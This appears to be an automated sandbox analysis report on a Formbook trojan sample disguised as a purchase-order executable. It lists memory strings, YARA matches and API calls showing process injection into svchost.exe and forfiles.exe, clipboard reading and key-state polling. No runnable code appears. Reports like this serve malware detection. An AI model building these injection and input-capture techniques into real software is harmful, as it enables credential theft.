Source: forfiles.exe, 0000000C.00000002.3136018758.0000000006224000.00000004.10000000.00040000.00000000.sdmp, forfiles.exe, 0000000C.00000002.3138066811.0000000007C40000.00000004.00000800.00020000.00000000.sdmp, AnbtBVreItY.exe, 0000000E.00000002.3135428231.0000000004444000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: https://www.imena.ua/domains/premium-domains
Source: forfiles.exe, 0000000C.00000002.3136018758.0000000006224000.00000004.10000000.00040000.00000000.sdmp, forfiles.exe, 0000000C.00000002.3138066811.0000000007C40000.00000004.00000800.00020000.00000000.sdmp, AnbtBVreItY.exe, 0000000E.00000002.3135428231.0000000004444000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: https://www.imena.ua/domains/prices
Source: forfiles.exe, 0000000C.00000002.3136018758.0000000006224000.00000004.10000000.00040000.00000000.sdmp, forfiles.exe, 0000000C.00000002.3138066811.0000000007C40000.00000004.00000800.00020000.00000000.sdmp, AnbtBVreItY.exe, 0000000E.00000002.3135428231.0000000004444000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: https://www.imena.ua/domains/regtm
Source: AnbtBVreItY.exe, 0000000E.00000002.3135428231.0000000004444000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: https://www.imena.ua/en
Source: forfiles.exe, 0000000C.00000002.3136018758.0000000006224000.00000004.10000000.00040000.00000000.sdmp, forfiles.exe, 0000000C.00000002.3138066811.0000000007C40000.00000004.00000800.00020000.00000000.sdmp, AnbtBVreItY.exe, 0000000E.00000002.3135428231.0000000004444000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: https://www.imena.ua/en/how-search
Source: AnbtBVreItY.exe, 0000000E.00000002.3135428231.0000000004444000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: https://www.imena.ua/help
Source: AnbtBVreItY.exe, 0000000E.00000002.3135428231.0000000004444000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: https://www.imena.ua/hosting
Source: forfiles.exe, 0000000C.00000002.3136018758.0000000006224000.00000004.10000000.00040000.00000000.sdmp, forfiles.exe, 0000000C.00000002.3138066811.0000000007C40000.00000004.00000800.00020000.00000000.sdmp, AnbtBVreItY.exe, 0000000E.00000002.3135428231.0000000004444000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: https://www.imena.ua/how-search
Source: forfiles.exe, 0000000C.00000002.3136018758.0000000006224000.00000004.10000000.00040000.00000000.sdmp, forfiles.exe, 0000000C.00000002.3138066811.0000000007C40000.00000004.00000800.00020000.00000000.sdmp, AnbtBVreItY.exe, 0000000E.00000002.3135428231.0000000004444000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: https://www.imena.ua/job
Source: AnbtBVreItY.exe, 0000000E.00000002.3135428231.0000000004444000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: https://www.imena.ua/payments
Source: AnbtBVreItY.exe, 0000000E.00000002.3135428231.0000000004444000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: https://www.imena.ua/ru
Source: AnbtBVreItY.exe, 0000000E.00000002.3135428231.0000000004444000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: https://www.imena.ua/servers
Source: forfiles.exe, 0000000C.00000002.3136018758.0000000006224000.00000004.10000000.00040000.00000000.sdmp, forfiles.exe, 0000000C.00000002.3138066811.0000000007C40000.00000004.00000800.00020000.00000000.sdmp, AnbtBVreItY.exe, 0000000E.00000002.3135428231.0000000004444000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: https://www.imena.ua/support/domains-finance/icann-i-ee-funkcii
Source: AnbtBVreItY.exe, 0000000E.00000002.3135428231.0000000004444000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: https://www.imena.ua/support/domains-finance/sposoby-oplaty-uslug-imena-ua
Source: AnbtBVreItY.exe, 0000000E.00000002.3135428231.0000000004444000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: https://www.imena.ua/ua
Source: AnbtBVreItY.exe, 0000000E.00000002.3135428231.0000000004444000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: https://www.imena.ua/vps
Source: AnbtBVreItY.exe, 0000000E.00000002.3135428231.0000000004444000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: https://www.imena.ua/whois.php?domain=spectre.center
Source: forfiles.exe, 0000000C.00000002.3136018758.0000000006224000.00000004.10000000.00040000.00000000.sdmp, forfiles.exe, 0000000C.00000002.3138066811.0000000007C40000.00000004.00000800.00020000.00000000.sdmp, AnbtBVreItY.exe, 0000000E.00000002.3135428231.0000000004444000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: https://www.ripe.net/
Source: C:\Users\user\Desktop\PO#001498.exe Code function: 0_2_0046C5D0 OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard, 0_2_0046C5D0
Source: C:\Users\user\Desktop\PO#001498.exe Code function: 0_2_00459FFF OpenClipboard,EmptyClipboard,CloseClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard, 0_2_00459FFF
Source: C:\Users\user\Desktop\PO#001498.exe Code function: 0_2_0046C5D0 OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard, 0_2_0046C5D0
Source: C:\Users\user\Desktop\PO#001498.exe Code function: 0_2_00456354 GetCursorPos,ScreenToClient,GetAsyncKeyState,GetAsyncKeyState,GetAsyncKeyState,GetWindowLongW, 0_2_00456354
Source: C:\Users\user\Desktop\PO#001498.exe Code function: 0_2_0047C08E SendMessageW,DefDlgProcW,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,GetWindowLongW,SendMessageW,SendMessageW,SendMessageW,_wcsncpy,SendMessageW,SendMessageW,SendMessageW,InvalidateRect,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW, 0_2_0047C08E

E-Banking Fraud

barindex
Source: Yara match File source: 8.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 8.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0000000C.00000002.3133057378.0000000004970000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.1776540328.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.3132858119.0000000004920000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.1776852488.0000000003590000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000002.3133096714.0000000002E90000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.3132094860.00000000044C0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.3120123793.0000000002CB0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.1777534454.0000000005050000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

System Summary

barindex
Source: 8.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 8.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 0000000C.00000002.3133057378.0000000004970000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000008.00000002.1776540328.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 0000000C.00000002.3132858119.0000000004920000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000008.00000002.1776852488.0000000003590000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 0000000E.00000002.3133096714.0000000002E90000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 0000000B.00000002.3132094860.00000000044C0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 0000000C.00000002.3120123793.0000000002CB0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000008.00000002.1777534454.0000000005050000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: initial sample Static PE information: Filename: PO#001498.exe
Source: C:\Windows\SysWOW64\svchost.exe Code function: 8_2_0042C5A3 NtClose, 8_2_0042C5A3
Source: C:\Windows\SysWOW64\svchost.exe Code function: 8_2_0040A9D4 NtAllocateVirtualMemory, 8_2_0040A9D4
Source: C:\Windows\SysWOW64\svchost.exe Code function: 8_2_03872B60 NtClose,LdrInitializeThunk, 8_2_03872B60
Source: C:\Windows\SysWOW64\svchost.exe Code function: 8_2_03872DF0 NtQuerySystemInformation,LdrInitializeThunk, 8_2_03872DF0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 8_2_038735C0 NtCreateMutant,LdrInitializeThunk, 8_2_038735C0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 8_2_03874340 NtSetContextThread, 8_2_03874340
Source: C:\Windows\SysWOW64\svchost.exe Code function: 8_2_03874650 NtSuspendThread, 8_2_03874650
Source: C:\Windows\SysWOW64\svchost.exe Code function: 8_2_03872B80 NtQueryInformationFile, 8_2_03872B80
Source: C:\Windows\SysWOW64\svchost.exe Code function: 8_2_03872BA0 NtEnumerateValueKey, 8_2_03872BA0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 8_2_03872BE0 NtQueryValueKey, 8_2_03872BE0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 8_2_03872BF0 NtAllocateVirtualMemory, 8_2_03872BF0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 8_2_03872AB0 NtWaitForSingleObject, 8_2_03872AB0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 8_2_03872AD0 NtReadFile, 8_2_03872AD0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 8_2_03872AF0 NtWriteFile, 8_2_03872AF0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 8_2_03872F90 NtProtectVirtualMemory, 8_2_03872F90
Source: C:\Windows\SysWOW64\svchost.exe Code function: 8_2_03872FA0 NtQuerySection, 8_2_03872FA0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 8_2_03872FB0 NtResumeThread, 8_2_03872FB0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 8_2_03872FE0 NtCreateFile, 8_2_03872FE0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 8_2_03872F30 NtCreateSection, 8_2_03872F30
Source: C:\Windows\SysWOW64\svchost.exe Code function: 8_2_03872F60 NtCreateProcessEx, 8_2_03872F60
Source: C:\Windows\SysWOW64\svchost.exe Code function: 8_2_03872E80 NtReadVirtualMemory, 8_2_03872E80
Source: C:\Windows\SysWOW64\svchost.exe Code function: 8_2_03872EA0 NtAdjustPrivilegesToken, 8_2_03872EA0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 8_2_03872EE0 NtQueueApcThread, 8_2_03872EE0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 8_2_03872E30 NtWriteVirtualMemory, 8_2_03872E30
Source: C:\Windows\SysWOW64\svchost.exe Code function: 8_2_03872DB0 NtEnumerateKey, 8_2_03872DB0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 8_2_03872DD0 NtDelayExecution, 8_2_03872DD0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 8_2_03872D00 NtSetInformationFile, 8_2_03872D00
Source: C:\Windows\SysWOW64\svchost.exe Code function: 8_2_03872D10 NtMapViewOfSection, 8_2_03872D10
Source: C:\Windows\SysWOW64\svchost.exe Code function: 8_2_03872D30 NtUnmapViewOfSection, 8_2_03872D30
Source: C:\Windows\SysWOW64\svchost.exe Code function: 8_2_03872CA0 NtQueryInformationToken, 8_2_03872CA0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 8_2_03872CC0 NtQueryVirtualMemory, 8_2_03872CC0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 8_2_03872CF0 NtOpenProcess, 8_2_03872CF0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 8_2_03872C00 NtQueryInformationProcess, 8_2_03872C00
Source: C:\Windows\SysWOW64\svchost.exe Code function: 8_2_03872C60 NtCreateKey, 8_2_03872C60
Source: C:\Windows\SysWOW64\svchost.exe Code function: 8_2_03872C70 NtFreeVirtualMemory, 8_2_03872C70
Source: C:\Windows\SysWOW64\svchost.exe Code function: 8_2_03873090 NtSetValueKey, 8_2_03873090
Source: C:\Windows\SysWOW64\svchost.exe Code function: 8_2_03873010 NtOpenDirectoryObject, 8_2_03873010
Source: C:\Windows\SysWOW64\svchost.exe Code function: 8_2_038739B0 NtGetContextThread, 8_2_038739B0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 8_2_03873D10 NtOpenProcessToken, 8_2_03873D10
Source: C:\Windows\SysWOW64\svchost.exe Code function: 8_2_03873D70 NtOpenThread, 8_2_03873D70
Source: C:\Windows\SysWOW64\forfiles.exe Code function: 12_2_04BF4650 NtSuspendThread,LdrInitializeThunk, 12_2_04BF4650
Source: C:\Windows\SysWOW64\forfiles.exe Code function: 12_2_04BF4340 NtSetContextThread,LdrInitializeThunk, 12_2_04BF4340
Source: C:\Windows\SysWOW64\forfiles.exe Code function: 12_2_04BF2CA0 NtQueryInformationToken,LdrInitializeThunk, 12_2_04BF2CA0
Source: C:\Windows\SysWOW64\forfiles.exe Code function: 12_2_04BF2C70 NtFreeVirtualMemory,LdrInitializeThunk, 12_2_04BF2C70
Source: C:\Windows\SysWOW64\forfiles.exe Code function: 12_2_04BF2C60 NtCreateKey,LdrInitializeThunk, 12_2_04BF2C60
Source: C:\Windows\SysWOW64\forfiles.exe Code function: 12_2_04BF2DF0 NtQuerySystemInformation,LdrInitializeThunk, 12_2_04BF2DF0
Source: C:\Windows\SysWOW64\forfiles.exe Code function: 12_2_04BF2DD0 NtDelayExecution,LdrInitializeThunk, 12_2_04BF2DD0
Source: C:\Windows\SysWOW64\forfiles.exe Code function: 12_2_04BF2D30 NtUnmapViewOfSection,LdrInitializeThunk, 12_2_04BF2D30
Source: C:\Windows\SysWOW64\forfiles.exe Code function: 12_2_04BF2D10 NtMapViewOfSection,LdrInitializeThunk, 12_2_04BF2D10
Source: C:\Windows\SysWOW64\forfiles.exe Code function: 12_2_04BF2E80 NtReadVirtualMemory,LdrInitializeThunk, 12_2_04BF2E80
Source: C:\Windows\SysWOW64\forfiles.exe Code function: 12_2_04BF2EE0 NtQueueApcThread,LdrInitializeThunk, 12_2_04BF2EE0
Source: C:\Windows\SysWOW64\forfiles.exe Code function: 12_2_04BF2FB0 NtResumeThread,LdrInitializeThunk, 12_2_04BF2FB0
Source: C:\Windows\SysWOW64\forfiles.exe Code function: 12_2_04BF2FE0 NtCreateFile,LdrInitializeThunk, 12_2_04BF2FE0
Source: C:\Windows\SysWOW64\forfiles.exe Code function: 12_2_04BF2F30 NtCreateSection,LdrInitializeThunk, 12_2_04BF2F30
Source: C:\Windows\SysWOW64\forfiles.exe Code function: 12_2_04BF2AF0 NtWriteFile,LdrInitializeThunk, 12_2_04BF2AF0
Source: C:\Windows\SysWOW64\forfiles.exe Code function: 12_2_04BF2AD0 NtReadFile,LdrInitializeThunk, 12_2_04BF2AD0
Source: C:\Windows\SysWOW64\forfiles.exe Code function: 12_2_04BF2BA0 NtEnumerateValueKey,LdrInitializeThunk, 12_2_04BF2BA0
Source: C:\Windows\SysWOW64\forfiles.exe Code function: 12_2_04BF2BF0 NtAllocateVirtualMemory,LdrInitializeThunk, 12_2_04BF2BF0
Source: C:\Windows\SysWOW64\forfiles.exe Code function: 12_2_04BF2BE0 NtQueryValueKey,LdrInitializeThunk, 12_2_04BF2BE0
Source: C:\Windows\SysWOW64\forfiles.exe Code function: 12_2_04BF2B60 NtClose,LdrInitializeThunk, 12_2_04BF2B60
Source: C:\Windows\SysWOW64\forfiles.exe Code function: 12_2_04BF35C0 NtCreateMutant,LdrInitializeThunk, 12_2_04BF35C0
Source: C:\Windows\SysWOW64\forfiles.exe Code function: 12_2_04BF39B0 NtGetContextThread,LdrInitializeThunk, 12_2_04BF39B0
Source: C:\Windows\SysWOW64\forfiles.exe Code function: 12_2_04BF2CF0 NtOpenProcess, 12_2_04BF2CF0
Source: C:\Windows\SysWOW64\forfiles.exe Code function: 12_2_04BF2CC0 NtQueryVirtualMemory, 12_2_04BF2CC0
Source: C:\Windows\SysWOW64\forfiles.exe Code function: 12_2_04BF2C00 NtQueryInformationProcess, 12_2_04BF2C00
Source: C:\Windows\SysWOW64\forfiles.exe Code function: 12_2_04BF2DB0 NtEnumerateKey, 12_2_04BF2DB0
Source: C:\Windows\SysWOW64\forfiles.exe Code function: 12_2_04BF2D00 NtSetInformationFile, 12_2_04BF2D00
Source: C:\Windows\SysWOW64\forfiles.exe Code function: 12_2_04BF2EA0 NtAdjustPrivilegesToken, 12_2_04BF2EA0
Source: C:\Windows\SysWOW64\forfiles.exe Code function: 12_2_04BF2E30 NtWriteVirtualMemory, 12_2_04BF2E30
Source: C:\Windows\SysWOW64\forfiles.exe Code function: 12_2_04BF2FA0 NtQuerySection, 12_2_04BF2FA0
Source: C:\Windows\SysWOW64\forfiles.exe Code function: 12_2_04BF2F90 NtProtectVirtualMemory, 12_2_04BF2F90
Source: C:\Windows\SysWOW64\forfiles.exe Code function: 12_2_04BF2F60 NtCreateProcessEx, 12_2_04BF2F60
Source: C:\Windows\SysWOW64\forfiles.exe Code function: 12_2_04BF2AB0 NtWaitForSingleObject, 12_2_04BF2AB0
Source: C:\Windows\SysWOW64\forfiles.exe Code function: 12_2_04BF2B80 NtQueryInformationFile, 12_2_04BF2B80
Source: C:\Windows\SysWOW64\forfiles.exe Code function: 12_2_04BF3090 NtSetValueKey, 12_2_04BF3090
Source: C:\Windows\SysWOW64\forfiles.exe Code function: 12_2_04BF3010 NtOpenDirectoryObject, 12_2_04BF3010
Source: C:\Windows\SysWOW64\forfiles.exe Code function: 12_2_04BF3D10 NtOpenProcessToken, 12_2_04BF3D10
Source: C:\Windows\SysWOW64\forfiles.exe Code function: 12_2_04BF3D70 NtOpenThread, 12_2_04BF3D70
Source: C:\Windows\SysWOW64\forfiles.exe Code function: 12_2_02CD9290 NtReadFile, 12_2_02CD9290
Source: C:\Windows\SysWOW64\forfiles.exe Code function: 12_2_02CD9380 NtDeleteFile, 12_2_02CD9380
Source: C:\Windows\SysWOW64\forfiles.exe Code function: 12_2_02CD9120 NtCreateFile, 12_2_02CD9120
Source: C:\Windows\SysWOW64\forfiles.exe Code function: 12_2_02CD9420 NtClose, 12_2_02CD9420
Source: C:\Windows\SysWOW64\forfiles.exe Code function: 12_2_02CD9590 NtAllocateVirtualMemory, 12_2_02CD9590
Source: C:\Users\user\Desktop\PO#001498.exe Code function: 0_2_00434D50: GetFullPathNameW,__swprintf,_wcslen,_wcslen,_wcslen,CreateDirectoryW,CreateFileW,_memset,_wcslen,_wcsncpy,DeviceIoControl,CloseHandle,RemoveDirectoryW,CloseHandle, 0_2_00434D50
Source: C:\Users\user\Desktop\PO#001498.exe Code function: 0_2_004461ED _memset,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcslen,_wcsncpy,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock, 0_2_004461ED
Source: C:\Users\user\Desktop\PO#001498.exe Code function: 0_2_004364AA GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,SetSystemPowerState, 0_2_004364AA
Source: C:\Users\user\Desktop\PO#001498.exe Code function: 0_2_00409A40 0_2_00409A40
Source: C:\Users\user\Desktop\PO#001498.exe Code function: 0_2_00412038 0_2_00412038
Source: C:\Users\user\Desktop\PO#001498.exe Code function: 0_2_00427161 0_2_00427161
Source: C:\Users\user\Desktop\PO#001498.exe Code function: 0_2_0047E1FA 0_2_0047E1FA
Source: C:\Users\user\Desktop\PO#001498.exe Code function: 0_2_004212BE 0_2_004212BE
Source: C:\Users\user\Desktop\PO#001498.exe Code function: 0_2_00443390 0_2_00443390
Source: C:\Users\user\Desktop\PO#001498.exe Code function: 0_2_00443391 0_2_00443391
Source: C:\Users\user\Desktop\PO#001498.exe Code function: 0_2_0041A46B 0_2_0041A46B
Source: C:\Users\user\Desktop\PO#001498.exe Code function: 0_2_0041240C 0_2_0041240C
Source: C:\Users\user\Desktop\PO#001498.exe Code function: 0_2_00446566 0_2_00446566
Source: C:\Users\user\Desktop\PO#001498.exe Code function: 0_2_004045E0 0_2_004045E0
Source: C:\Users\user\Desktop\PO#001498.exe Code function: 0_2_0041D750 0_2_0041D750
Source: C:\Users\user\Desktop\PO#001498.exe Code function: 0_2_004037E0 0_2_004037E0
Source: C:\Users\user\Desktop\PO#001498.exe Code function: 0_2_00427859 0_2_00427859
Source: C:\Users\user\Desktop\PO#001498.exe Code function: 0_2_00412818 0_2_00412818
Source: C:\Users\user\Desktop\PO#001498.exe Code function: 0_2_0040F890 0_2_0040F890
Source: C:\Users\user\Desktop\PO#001498.exe Code function: 0_2_0042397B 0_2_0042397B
Source: C:\Users\user\Desktop\PO#001498.exe Code function: 0_2_00411B63 0_2_00411B63
Source: C:\Users\user\Desktop\PO#001498.exe Code function: 0_2_0047CBF0 0_2_0047CBF0
Source: C:\Users\user\Desktop\PO#001498.exe Code function: 0_2_0044EBBC 0_2_0044EBBC
Source: C:\Users\user\Desktop\PO#001498.exe Code function: 0_2_00412C38 0_2_00412C38
Source: C:\Users\user\Desktop\PO#001498.exe Code function: 0_2_0044ED9A 0_2_0044ED9A
Source: C:\Users\user\Desktop\PO#001498.exe Code function: 0_2_00423EBF 0_2_00423EBF
Source: C:\Users\user\Desktop\PO#001498.exe Code function: 0_2_00424F70 0_2_00424F70
Source: C:\Users\user\Desktop\PO#001498.exe Code function: 0_2_0041AF0D 0_2_0041AF0D
Source: C:\Users\user\Desktop\PO#001498.exe Code function: 0_2_0427A628 0_2_0427A628
Source: C:\Windows\SysWOW64\svchost.exe Code function: 8_2_004184E3 8_2_004184E3
Source: C:\Windows\SysWOW64\svchost.exe Code function: 8_2_0040E033 8_2_0040E033
Source: C:\Windows\SysWOW64\svchost.exe Code function: 8_2_00401160 8_2_00401160
Source: C:\Windows\SysWOW64\svchost.exe Code function: 8_2_0040196D 8_2_0040196D
Source: C:\Windows\SysWOW64\svchost.exe Code function: 8_2_00401970 8_2_00401970
Source: C:\Windows\SysWOW64\svchost.exe Code function: 8_2_004021E4 8_2_004021E4
Source: C:\Windows\SysWOW64\svchost.exe Code function: 8_2_004021F0 8_2_004021F0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 8_2_00402A0B 8_2_00402A0B
Source: C:\Windows\SysWOW64\svchost.exe Code function: 8_2_00402A10 8_2_00402A10
Source: C:\Windows\SysWOW64\svchost.exe Code function: 8_2_00404324 8_2_00404324
Source: C:\Windows\SysWOW64\svchost.exe Code function: 8_2_0042EBC3 8_2_0042EBC3
Source: C:\Windows\SysWOW64\svchost.exe Code function: 8_2_0040FD91 8_2_0040FD91
Source: C:\Windows\SysWOW64\svchost.exe Code function: 8_2_0040FD93 8_2_0040FD93
Source: C:\Windows\SysWOW64\svchost.exe Code function: 8_2_004166CE 8_2_004166CE
Source: C:\Windows\SysWOW64\svchost.exe Code function: 8_2_004166D3 8_2_004166D3
Source: C:\Windows\SysWOW64\svchost.exe Code function: 8_2_00402EE0 8_2_00402EE0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 8_2_0040FFB3 8_2_0040FFB3
Source: C:\Windows\SysWOW64\svchost.exe Code function: 8_2_0384E3F0 8_2_0384E3F0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 8_2_039003E6 8_2_039003E6
Source: C:\Windows\SysWOW64\svchost.exe Code function: 8_2_038FA352 8_2_038FA352
Source: C:\Windows\SysWOW64\svchost.exe Code function: 8_2_038C02C0 8_2_038C02C0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 8_2_038E0274 8_2_038E0274
Source: C:\Windows\SysWOW64\svchost.exe Code function: 8_2_038F41A2 8_2_038F41A2
Source: C:\Windows\SysWOW64\svchost.exe Code function: 8_2_039001AA 8_2_039001AA
Source: C:\Windows\SysWOW64\svchost.exe Code function: 8_2_038F81CC 8_2_038F81CC
Source: C:\Windows\SysWOW64\svchost.exe Code function: 8_2_03830100 8_2_03830100
Source: C:\Windows\SysWOW64\svchost.exe Code function: 8_2_038DA118 8_2_038DA118
Source: C:\Windows\SysWOW64\svchost.exe Code function: 8_2_038C8158 8_2_038C8158
Source: C:\Windows\SysWOW64\svchost.exe Code function: 8_2_038D2000 8_2_038D2000
Source: C:\Windows\SysWOW64\svchost.exe Code function: 8_2_0383C7C0 8_2_0383C7C0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 8_2_03864750 8_2_03864750
Source: C:\Windows\SysWOW64\svchost.exe Code function: 8_2_03840770 8_2_03840770
Source: C:\Windows\SysWOW64\svchost.exe Code function: 8_2_0385C6E0 8_2_0385C6E0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 8_2_03900591 8_2_03900591
Source: C:\Windows\SysWOW64\svchost.exe Code function: 8_2_03840535 8_2_03840535
Source: C:\Windows\SysWOW64\svchost.exe Code function: 8_2_038EE4F6 8_2_038EE4F6
Source: C:\Windows\SysWOW64\svchost.exe Code function: 8_2_038E4420 8_2_038E4420
Source: C:\Windows\SysWOW64\svchost.exe Code function: 8_2_038F2446 8_2_038F2446
Source: C:\Windows\SysWOW64\svchost.exe Code function: 8_2_038F6BD7 8_2_038F6BD7
Source: C:\Windows\SysWOW64\svchost.exe Code function: 8_2_038FAB40 8_2_038FAB40
Source: C:\Windows\SysWOW64\svchost.exe Code function: 8_2_0383EA80 8_2_0383EA80
Source: C:\Windows\SysWOW64\svchost.exe Code function: 8_2_038429A0 8_2_038429A0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 8_2_0390A9A6 8_2_0390A9A6
Source: C:\Windows\SysWOW64\svchost.exe Code function: 8_2_03856962 8_2_03856962
Source: C:\Windows\SysWOW64\svchost.exe Code function: 8_2_038268B8 8_2_038268B8
Source: C:\Windows\SysWOW64\svchost.exe Code function: 8_2_0386E8F0 8_2_0386E8F0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 8_2_0384A840 8_2_0384A840
Source: C:\Windows\SysWOW64\svchost.exe Code function: 8_2_03842840 8_2_03842840
Source: C:\Windows\SysWOW64\svchost.exe Code function: 8_2_038BEFA0 8_2_038BEFA0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 8_2_03832FC8 8_2_03832FC8
Source: C:\Windows\SysWOW64\svchost.exe Code function: 8_2_0384CFE0 8_2_0384CFE0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 8_2_03882F28 8_2_03882F28
Source: C:\Windows\SysWOW64\svchost.exe Code function: 8_2_03860F30 8_2_03860F30
Source: C:\Windows\SysWOW64\svchost.exe Code function: 8_2_038E2F30 8_2_038E2F30
Source: C:\Windows\SysWOW64\svchost.exe Code function: 8_2_038B4F40 8_2_038B4F40
Source: C:\Windows\SysWOW64\svchost.exe Code function: 8_2_03852E90 8_2_03852E90
Source: C:\Windows\SysWOW64\svchost.exe Code function: 8_2_038FCE93 8_2_038FCE93
Source: C:\Windows\SysWOW64\svchost.exe Code function: 8_2_038FEEDB 8_2_038FEEDB
Source: C:\Windows\SysWOW64\svchost.exe Code function: 8_2_038FEE26 8_2_038FEE26
Source: C:\Windows\SysWOW64\svchost.exe Code function: 8_2_03840E59 8_2_03840E59
Source: C:\Windows\SysWOW64\svchost.exe Code function: 8_2_03858DBF 8_2_03858DBF
Source: C:\Windows\SysWOW64\svchost.exe Code function: 8_2_0383ADE0 8_2_0383ADE0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 8_2_0384AD00 8_2_0384AD00
Source: C:\Windows\SysWOW64\svchost.exe Code function: 8_2_038DCD1F 8_2_038DCD1F
Source: C:\Windows\SysWOW64\svchost.exe Code function: 8_2_038E0CB5 8_2_038E0CB5
Source: C:\Windows\SysWOW64\svchost.exe Code function: 8_2_03830CF2 8_2_03830CF2
Source: C:\Windows\SysWOW64\svchost.exe Code function: 8_2_03840C00 8_2_03840C00
Source: C:\Windows\SysWOW64\svchost.exe Code function: 8_2_0388739A 8_2_0388739A
Source: C:\Windows\SysWOW64\svchost.exe Code function: 8_2_038F132D 8_2_038F132D
Source: C:\Windows\SysWOW64\svchost.exe Code function: 8_2_0382D34C 8_2_0382D34C
